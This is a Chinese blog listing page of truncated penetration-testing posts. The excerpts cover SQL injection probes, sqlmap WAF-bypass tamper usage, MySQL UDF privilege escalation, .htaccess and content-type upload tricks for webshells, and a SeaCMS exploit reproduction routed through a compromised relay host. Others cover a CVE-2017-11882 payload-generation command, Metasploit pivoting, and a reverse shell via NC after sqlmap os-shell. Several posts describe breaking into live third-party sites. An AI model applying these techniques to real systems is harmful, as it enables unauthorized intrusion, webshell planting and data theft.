渗透
椰树ii
这个作者很懒,什么都没留下…
展开
-
access注入及工具使用
Access数据结构: Access数据库 表名 列名 数据Access注入: 首先判断是否有注入点: http://www.xxx.com/xxx.asp?id=166’(页面返回错误)http://www.xxx.com/xxx.asp?id=166and 1=1(页面返原创 2017-04-29 16:51:46 · 1045 阅读 · 0 评论 -
高版本的udf提权
最近一直在学习技术,虽然过程中遇到了些问题,但都解决了。下面就记录一些吧,给自己老年的时候看,哈哈哈。--怀着一颗低调的心奋发前行。配置环境:phpstudy(mysql5.5.53版本) 2012R2 64位首先访问脚本,是款暗月的mysql全版本通杀提权神器,网上找的。需要输入mysql数据库帐号密码,因为我是本地搭建的,所以帐号密码都是root(具体实战,就要自己去想办法找数据库帐号密码了...原创 2018-02-08 11:41:36 · 6519 阅读 · 1 评论 -
海洋CMS复现
使用环境:肉鸡服务器:103.229.126.201攻击机:win7(192.168.72.130)目标机:win7(192.168.72.129)+(seacms v6.53)POC:POST /seacms/upload/search.php HTTP/1.1Host: 192.168.72.129User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; ...原创 2017-11-08 14:38:02 · 2311 阅读 · 0 评论 -
内网渗透之MSF 路由转发
如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。 MSF跳板实现过程: 需要获得一个msf的session会话; 获取内网地址网段; 在msf中添加”内网网段“的路由; 获取内网网段地址: 例如:meterpre...原创 2017-11-22 11:24:22 · 8647 阅读 · 0 评论 -
CVE-2017-11882复现
目标机:win7 office2013 (192.168.72.129)攻击机:kali (192.168.72.139)利用脚本工具:https://github.com/starnightcyber/CVE-2017-11882复现0x01:使用在上述的工具,生成漏洞的doc文件。python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe"...原创 2017-11-22 15:23:58 · 856 阅读 · 0 评论 -
通过注入拿下服务器
首先,碰到了个站。注入漏洞,看一下是不是DBA权限。 当前用户是DBA权限,执行os-shell 可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。 能直接上传文件,上传NC,反弹shell(sqlmap里shell实在卡得不行,回显太慢)...原创 2017-12-28 14:58:49 · 2776 阅读 · 1 评论 -
sqlmap的tamper问题
每次日站时,看见安全狗都失望完!所有接下来分析过滤系统到底过滤了哪些参数,该如何绕过。sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。所以有的时候我们会发现,注入成功了但是dump不原创 2017-05-24 21:28:09 · 1493 阅读 · 0 评论 -
sqlmap常用命令
-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume)–colum原创 2017-05-24 21:05:03 · 489 阅读 · 0 评论 -
htaccess文件上传拿shell
1.创建htaccess文件,编辑内容为:SetHandler application/x-httpd-php然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。2.编辑内容为: demo.jpg> ForceType application/x-httpd-php SetHandler application/x-httpd-php 指定文件名的原创 2017-05-24 20:50:58 · 5993 阅读 · 0 评论 -
渗透之信息收集
在渗透测试开始之前,第一步信息收集,对网站的结构有个初步了解,第二步才是扫目录。那么,信息收集包括哪方面呢,主要是:IP地址,端口,脚本类型,搭建环境,whois查询等。例如目标网站:http://www.bplead.com/ 查询SEO:可见,权重为0,一般的权重为0,1,2,3还是容易日的,大于3的直接pass,但是你厉害的话,可以忽略这话。IP地址为:123原创 2017-05-24 12:21:30 · 609 阅读 · 0 评论 -
文件包含拿webshell
本实验的目的:如何在杀软软件防范下绕过检测上传大马。 新建一个记事本,内容为 命名为:1.asp将我们的大马.asp改名为:123.jpg 将上述的1.asp和123.jpg上传到菜刀里接下来,访问1.aspOK,成功执行大马。注:这段代码意思是包含一个文件,名为:123.jpg。当我们访问1.asp的时候,123.原创 2017-04-30 14:48:36 · 3740 阅读 · 0 评论 -
记Fck编辑器拿shell
那天同学的QQ被黑发来的挂马网站手贱看了下。用御剑扫描了一下。有FCK编辑器。但御剑扫出的url访问的页面不正常。于是在网上查了查关于FCK编辑器的路径。fckeditor/editor/filemanager/browser/default/browser.html?typeall&connector=connectors/aspx/connector.a原创 2017-04-29 17:31:15 · 3793 阅读 · 0 评论 -
通过后台登入界面拿到管理员帐号密码-post注入
post注入主要针对登入界面。一.第一种方法就是利用sqlmap自动填写表单.命令:sqlmap.py –u”www.xxx.com/xxx/login.asp“ --forms一般情况下一路回车二.第二种利用brupsite抓包,在用sqlmap –r 命令然后打开sqlmap 输入命令:sqlmap.py –r 将刚才保存的文本拖进去中执行。原创 2017-04-29 17:21:37 · 7535 阅读 · 0 评论 -
Filetype修改上传
产生条件:上传点只对文件上传类型及大小判断(没验证文件后缀),此时就可以改Filetype绕过上传。JPG文件后缀自带的typePhp文件后缀自带的type(这时是不允许上传的)然后将php的文件类型替换成jpg的文件类型。 即可绕过上传原创 2017-04-29 16:56:50 · 567 阅读 · 0 评论 -
cookie中转注入,使用sqlmap中转注入
一,判断是否有cookie注入:目标网站http://www.xxx.com/x.asp?id=11.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访...原创 2017-04-29 17:04:33 · 7317 阅读 · 0 评论